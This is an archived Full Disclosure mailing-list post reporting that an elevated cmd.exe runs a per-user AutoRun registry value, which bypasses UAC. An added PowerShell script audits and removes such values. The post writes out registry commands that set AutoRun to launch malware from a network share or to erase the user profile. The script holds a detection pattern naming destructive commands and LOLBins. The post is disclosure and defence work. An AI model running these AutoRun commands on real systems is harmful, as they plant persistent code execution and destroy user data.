Full Disclosure mailing list archives

Defense in depth -- the Microsoft way (part 68): qUACkery is futile!


From: "Stefan Kanthak" <stefan.kanthak () nexgo de>
Date: Wed, 3 Jun 2020 15:40:19 +0200

Hi @ll,

the help text displayed by the command line "%COMSPEC% /?" as well as the
documentation <https://msdn.microsoft.com/en-us/library/cc771320.aspx> of
Windows' command processor CMD.EXE both state:

| * Executing registry subkeys
|
|   If you do not specify /d in String, Cmd.exe looks for the following
|   registry subkeys:
|
|   HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun\REG_SZ
|
|   HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun\REG_EXPAND_SZ
|
|   If one or both registry subkeys are present, they are executed before
|   all other variables.
|
|    ^
|   /!\ Warning
|   ¯¯¯
|   Incorrectly editing the registry may severely damage your system.


Especially this last remark is NOT correct, or at least incomplete:
correctly editing the registry may severely damage your system too!


Demonstration:
~~~~~~~~~~~~~~

0. Log on to the "protected" administrator account created during the
   installation of Windows.

1. Run the following command line to add the AutoRun registry entry:

   REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ /D "ECHO HKEY_CURRENT_USER" /F

2. Start the command processor C:\Windows\System32\cmd.exe per double-
   click or via command line %COMSPEC%: it prints the line

   | HKEY_CURRENT_USER

3. Start Windows^WFile Explorer, open the "System" directory, right-
   click on C:\Windows\System32\cmd.exe to display its context menu,
   then click on the "Run as administrator" entry and acknowledge the
   UAC prompt: again it prints the line

   | HKEY_CURRENT_USER

   OUCH: although running elevated now, the command processor evaluates
         a registry entry written by an unprivileged user, thereby
         bypassing the "wonderful" but completely futile security theatre
         known as user account control!

   JFTR: of course nobody uses the "protected" administrator account
         created during Windows setup for their everyday work, and also
         nobody will EVER start an elevated command prompt there?!


Now just consider running one of the following command lines and imagine
what damage their execution may spark:

REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ /D "\\server\share\malware.exe" /F

REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ /D "ERASE /F /Q /S ""%USERPROFILE%""" /F


stay tuned, and far away from "protected" accounts and split tokens!
Stefan Kanthak


PS: compare this misbehaviour of the command processor to that of COM, as
    documented in <https://msdn.microsoft.com/en-us/library/bb756926.aspx>:

| Beginning with Windows Vista® and Windows Server® 2008, if the integrity
| level of a process is higher than Medium, the COM runtime ignores per-
| user COM configuration and accesses only per-machine COM configuration.
| This action reduces the surface area for elevation of privilege attacks,
| preventing a process with standard user privileges from configuring a
| COM object with arbitrary code and having this code called from an
| elevated process.


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
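Editor's note: the following PowerShell script is an added example, not part of Stefan Kanthak's post. It audits the two documented AutoRun locations that CMD.EXE evaluates unless started with /d (the HKLM and HKCU "Command Processor" keys quoted above), reads the stored data without expanding environment variables, flags values that look like a payload using a constructed, purely illustrative pattern (UNC paths and a handful of destructive or LOLBin-style command words), and offers a cleanup function with -WhatIf support. It assumes Windows PowerShell 5.1 or PowerShell 7 on Windows; removing the HKLM value requires an elevated session.

```powershell
# Added example (not part of the original post): audit, and optionally
# remove, the "AutoRun" values that CMD.EXE evaluates unless started with /d.
# Assumes Windows PowerShell 5.1 or PowerShell 7 on Windows. The registry
# paths are the two documented locations from the quoted cmd.exe help text.

$AutoRunKeys = @(
    'HKLM:\Software\Microsoft\Command Processor',
    'HKCU:\Software\Microsoft\Command Processor'
)

# Constructed heuristic for "looks like a payload": a UNC path, or a
# destructive / LOLBin-style command word. Illustrative only; tune to taste.
$SuspectPattern = '\\\\[^\\]+\\|\b(erase|del|rd|rmdir|format|cipher|powershell|pwsh|mshta|certutil|bitsadmin|rundll32)\b'

function Get-CmdAutoRun {
    # Returns one object per hive that carries an AutoRun value.
    foreach ($path in $AutoRunKeys) {
        $key = Get-Item -Path $path -ErrorAction SilentlyContinue
        if ($null -eq $key) { continue }
        # Read the raw data without expanding %VARS%, so a REG_EXPAND_SZ
        # payload is reported exactly as stored rather than as it would run.
        $data = $key.GetValue('AutoRun', $null,
            [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
        if ($null -eq $data) { continue }
        [pscustomobject]@{
            Hive       = $path.Split(':')[0]
            Type       = $key.GetValueKind('AutoRun')
            Data       = $data
            Suspicious = [bool]("$data" -match $SuspectPattern)
        }
    }
}

function Remove-CmdAutoRun {
    # Deletes the AutoRun value from both hives (HKLM needs elevation).
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($path in $AutoRunKeys) {
        if (Get-ItemProperty -Path $path -Name AutoRun -ErrorAction SilentlyContinue) {
            if ($PSCmdlet.ShouldProcess("$path\AutoRun", 'Remove registry value')) {
                Remove-ItemProperty -Path $path -Name AutoRun
            }
        }
    }
}

# Report what any cmd.exe started without /d, elevated or not, would
# execute before the first prompt.
$findings = Get-CmdAutoRun
if ($findings) {
    $findings | Format-Table -AutoSize
} else {
    'No AutoRun value present in HKLM or HKCU.'
}

# Cleanup, e.g. after reproducing the demonstration in the post:
#   Remove-CmdAutoRun -WhatIf   # preview what would be deleted
#   Remove-CmdAutoRun           # delete
```

The per-user value cannot be made invisible to an elevated cmd.exe by ACLs, because it lives in the elevated session's own HKCU hive; the only documented way to keep it from running is to start the command processor with /d ("Disable execution of AutoRun commands from registry"), so scheduled tasks, scripts and tooling that spawn cmd.exe with /c or /k should pass /d as well. For detection, a write to a value named AutoRun under either "Command Processor" key is a cheap, high-signal event to watch in registry auditing or Sysmon RegistryEvent (value set) telemetry.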